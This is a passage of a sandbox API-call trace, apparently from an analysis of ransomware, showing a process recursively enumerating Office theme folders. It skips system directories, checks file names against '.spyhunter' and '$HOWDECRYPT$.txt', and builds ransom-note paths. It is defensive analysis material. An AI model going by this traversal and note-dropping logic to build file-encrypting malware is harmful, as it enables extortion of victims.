lpSrch=".spyhunter") returned 0x0 [0090.432] lstrcmpW (lpString1="EDGE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.432] lstrcmpW (lpString1="EDGE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.432] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM") returned 73 [0090.432] GetProcessHeap () returned 0x2c0000 [0090.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x3856e0 [0090.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1090) returned 0x3824f8 [0090.432] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.432] lstrcmpiW (lpString1="EDGE.INF", lpString2="Windows") returned -1 [0090.432] lstrlenW (lpString="Windows") returned 7 [0090.432] lstrcmpiW (lpString1="EDGE.INF", lpString2="$Recycle.bin") returned 1 [0090.432] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.432] lstrcmpiW (lpString1="EDGE.INF", lpString2="System Volume Information") returned -1 [0090.432] lstrlenW (lpString="System Volume Information") returned 25 [0090.432] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF") returned 73 [0090.432] StrStrIW (lpFirst="EDGE.INF", lpSrch=".spyhunter") returned 0x0 [0090.432] lstrcmpW (lpString1="EDGE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.432] lstrcmpW (lpString1="EDGE.INF", lpString2="_uninstalling_.png") returned 1 [0090.432] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF") returned 73 [0090.432] GetProcessHeap () returned 0x2c0000 [0090.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x3864e0 [0090.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1098) returned 0x3824f8 [0090.432] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.432] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.432] lstrlenW (lpString="Windows") returned 7 [0090.432] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.432] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.432] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.433] lstrlenW (lpString="System Volume Information") returned 25 [0090.433] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 76 [0090.433] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.433] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.433] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.433] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 76 [0090.433] GetProcessHeap () returned 0x2c0000 [0090.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x375608 [0090.433] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10a0) returned 0x3824f8 [0090.433] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.433] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.433] lstrlenW (lpString="Windows") returned 7 [0090.433] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.433] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.433] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.433] lstrlenW (lpString="System Volume Information") returned 25 [0090.433] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 77 [0090.433] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.433] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.433] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.433] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 77 [0090.433] GetProcessHeap () returned 0x2c0000 [0090.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3756f0 [0090.433] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10a8) returned 0x3824f8 [0090.433] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.433] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.434] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\$HOWDECRYPT$.txt") returned 81 [0090.434] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\$HOWDECRYPT$.txt") returned 81 [0090.434] GetProcessHeap () returned 0x2c0000 [0090.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344748 [0090.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10b0) returned 0x3824f8 [0090.434] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.434] lstrcmpiW (lpString1="EVRGREEN", lpString2="Windows") returned -1 [0090.434] lstrlenW (lpString="Windows") returned 7 [0090.434] lstrcmpiW (lpString1="EVRGREEN", lpString2="$Recycle.bin") returned 1 [0090.434] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.434] lstrcmpiW (lpString1="EVRGREEN", lpString2="System Volume Information") returned -1 [0090.434] lstrlenW (lpString="System Volume Information") returned 25 [0090.434] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN") returned 68 [0090.434] lstrcmpW (lpString1="EVRGREEN", lpString2=".") returned 1 [0090.434] lstrcmpW (lpString1="EVRGREEN", lpString2="..") returned 1 [0090.434] GetProcessHeap () returned 0x2c0000 [0090.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.434] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*") returned 70 [0090.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.438] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.438] lstrlenW (lpString="Windows") returned 7 [0090.438] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.438] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.438] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.438] lstrlenW (lpString="System Volume Information") returned 25 [0090.438] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\.") returned 70 [0090.438] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.438] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.439] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.439] lstrlenW (lpString="Windows") returned 7 [0090.439] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.439] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.439] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.439] lstrlenW (lpString="System Volume Information") returned 25 [0090.439] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\..") returned 71 [0090.439] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.439] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.439] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.439] lstrcmpiW (lpString1="EVRGREEN.ELM", lpString2="Windows") returned -1 [0090.439] lstrlenW (lpString="Windows") returned 7 [0090.439] lstrcmpiW (lpString1="EVRGREEN.ELM", lpString2="$Recycle.bin") returned 1 [0090.439] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.439] lstrcmpiW (lpString1="EVRGREEN.ELM", lpString2="System Volume Information") returned -1 [0090.439] lstrlenW (lpString="System Volume Information") returned 25 [0090.439] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM") returned 81 [0090.439] StrStrIW (lpFirst="EVRGREEN.ELM", lpSrch=".spyhunter") returned 0x0 [0090.439] lstrcmpW (lpString1="EVRGREEN.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.439] lstrcmpW (lpString1="EVRGREEN.ELM", lpString2="_uninstalling_.png") returned 1 [0090.439] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.ELM") returned 81 [0090.439] GetProcessHeap () returned 0x2c0000 [0090.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x345468 [0090.439] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10b8) returned 0x3824f8 [0090.439] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.439] lstrcmpiW (lpString1="EVRGREEN.INF", lpString2="Windows") returned -1 [0090.439] lstrlenW (lpString="Windows") returned 7 [0090.439] lstrcmpiW (lpString1="EVRGREEN.INF", lpString2="$Recycle.bin") returned 1 [0090.440] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.440] lstrcmpiW (lpString1="EVRGREEN.INF", lpString2="System Volume Information") returned -1 [0090.440] lstrlenW (lpString="System Volume Information") returned 25 [0090.441] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF") returned 81 [0090.441] StrStrIW (lpFirst="EVRGREEN.INF", lpSrch=".spyhunter") returned 0x0 [0090.441] lstrcmpW (lpString1="EVRGREEN.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.442] lstrcmpW (lpString1="EVRGREEN.INF", lpString2="_uninstalling_.png") returned 1 [0090.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\EVRGREEN.INF") returned 81 [0090.442] GetProcessHeap () returned 0x2c0000 [0090.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x345558 [0090.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10c0) returned 0x3824f8 [0090.442] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.442] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.442] lstrlenW (lpString="Windows") returned 7 [0090.442] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.442] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.442] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.442] lstrlenW (lpString="System Volume Information") returned 25 [0090.442] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 80 [0090.442] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.442] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.442] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 80 [0090.442] GetProcessHeap () returned 0x2c0000 [0090.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x345648 [0090.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10c8) returned 0x3824f8 [0090.442] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.442] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.442] lstrlenW (lpString="Windows") returned 7 [0090.442] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.442] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.442] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.442] lstrlenW (lpString="System Volume Information") returned 25 [0090.443] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 81 [0090.443] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.443] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.443] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 81 [0090.443] GetProcessHeap () returned 0x2c0000 [0090.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x345738 [0090.443] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10d0) returned 0x3824f8 [0090.443] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.443] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.443] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\$HOWDECRYPT$.txt") returned 85 [0090.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\$HOWDECRYPT$.txt") returned 85 [0090.443] GetProcessHeap () returned 0x2c0000 [0090.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354bf0 [0090.443] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10d8) returned 0x3824f8 [0090.443] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.443] lstrcmpiW (lpString1="EXPEDITN", lpString2="Windows") returned -1 [0090.443] lstrlenW (lpString="Windows") returned 7 [0090.443] lstrcmpiW (lpString1="EXPEDITN", lpString2="$Recycle.bin") returned 1 [0090.443] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.443] lstrcmpiW (lpString1="EXPEDITN", lpString2="System Volume Information") returned -1 [0090.443] lstrlenW (lpString="System Volume Information") returned 25 [0090.443] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN") returned 68 [0090.443] lstrcmpW (lpString1="EXPEDITN", lpString2=".") returned 1 [0090.444] lstrcmpW (lpString1="EXPEDITN", lpString2="..") returned 1 [0090.444] GetProcessHeap () returned 0x2c0000 [0090.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.444] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*") returned 70 [0090.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.444] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.444] lstrlenW (lpString="Windows") returned 7 [0090.444] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.444] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.444] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.444] lstrlenW (lpString="System Volume Information") returned 25 [0090.444] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\.") returned 70 [0090.444] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.444] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.444] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.444] lstrlenW (lpString="Windows") returned 7 [0090.444] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.444] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.444] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.444] lstrlenW (lpString="System Volume Information") returned 25 [0090.444] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\..") returned 71 [0090.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.445] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.445] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.445] lstrcmpiW (lpString1="EXPEDITN.ELM", lpString2="Windows") returned -1 [0090.445] lstrlenW (lpString="Windows") returned 7 [0090.445] lstrcmpiW (lpString1="EXPEDITN.ELM", lpString2="$Recycle.bin") returned 1 [0090.445] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.445] lstrcmpiW (lpString1="EXPEDITN.ELM", lpString2="System Volume Information") returned -1 [0090.445] lstrlenW (lpString="System Volume Information") returned 25 [0090.445] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM") returned 81 [0090.445] StrStrIW (lpFirst="EXPEDITN.ELM", lpSrch=".spyhunter") returned 0x0 [0090.445] lstrcmpW (lpString1="EXPEDITN.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.445] lstrcmpW (lpString1="EXPEDITN.ELM", lpString2="_uninstalling_.png") returned 1 [0090.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.ELM") returned 81 [0090.445] GetProcessHeap () returned 0x2c0000 [0090.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x341000 [0090.445] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10e0) returned 0x3824f8 [0090.445] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.445] lstrcmpiW (lpString1="EXPEDITN.INF", lpString2="Windows") returned -1 [0090.445] lstrlenW (lpString="Windows") returned 7 [0090.445] lstrcmpiW (lpString1="EXPEDITN.INF", lpString2="$Recycle.bin") returned 1 [0090.445] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.445] lstrcmpiW (lpString1="EXPEDITN.INF", lpString2="System Volume Information") returned -1 [0090.445] lstrlenW (lpString="System Volume Information") returned 25 [0090.445] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF") returned 81 [0090.445] StrStrIW (lpFirst="EXPEDITN.INF", lpSrch=".spyhunter") returned 0x0 [0090.445] lstrcmpW (lpString1="EXPEDITN.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.445] lstrcmpW (lpString1="EXPEDITN.INF", lpString2="_uninstalling_.png") returned 1 [0090.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\EXPEDITN.INF") returned 81 [0090.446] GetProcessHeap () returned 0x2c0000 [0090.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3410f0 [0090.446] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10e8) returned 0x3824f8 [0090.446] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.446] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.446] lstrlenW (lpString="Windows") returned 7 [0090.446] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.446] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.446] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.446] lstrlenW (lpString="System Volume Information") returned 25 [0090.446] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 80 [0090.446] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.446] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.446] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.446] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 80 [0090.446] GetProcessHeap () returned 0x2c0000 [0090.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3411e0 [0090.446] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10f0) returned 0x3824f8 [0090.446] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.446] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.446] lstrlenW (lpString="Windows") returned 7 [0090.446] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.446] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.446] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.446] lstrlenW (lpString="System Volume Information") returned 25 [0090.446] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 81 [0090.446] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.446] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.447] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.447] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 81 [0090.447] GetProcessHeap () returned 0x2c0000 [0090.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3412d0 [0090.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10f8) returned 0x3824f8 [0090.447] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.447] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.447] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\$HOWDECRYPT$.txt") returned 85 [0090.447] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\$HOWDECRYPT$.txt") returned 85 [0090.447] GetProcessHeap () returned 0x2c0000 [0090.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354ce8 [0090.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1100) returned 0x3824f8 [0090.447] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.447] lstrcmpiW (lpString1="ICE", lpString2="Windows") returned -1 [0090.447] lstrlenW (lpString="Windows") returned 7 [0090.447] lstrcmpiW (lpString1="ICE", lpString2="$Recycle.bin") returned 1 [0090.447] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.447] lstrcmpiW (lpString1="ICE", lpString2="System Volume Information") returned -1 [0090.447] lstrlenW (lpString="System Volume Information") returned 25 [0090.447] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE") returned 63 [0090.447] lstrcmpW (lpString1="ICE", lpString2=".") returned 1 [0090.447] lstrcmpW (lpString1="ICE", lpString2="..") returned 1 [0090.447] GetProcessHeap () returned 0x2c0000 [0090.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.448] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*") returned 65 [0090.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.471] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.471] lstrlenW (lpString="Windows") returned 7 [0090.471] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.471] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.471] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.471] lstrlenW (lpString="System Volume Information") returned 25 [0090.471] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\.") returned 65 [0090.471] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.471] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.471] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.471] lstrlenW (lpString="Windows") returned 7 [0090.471] 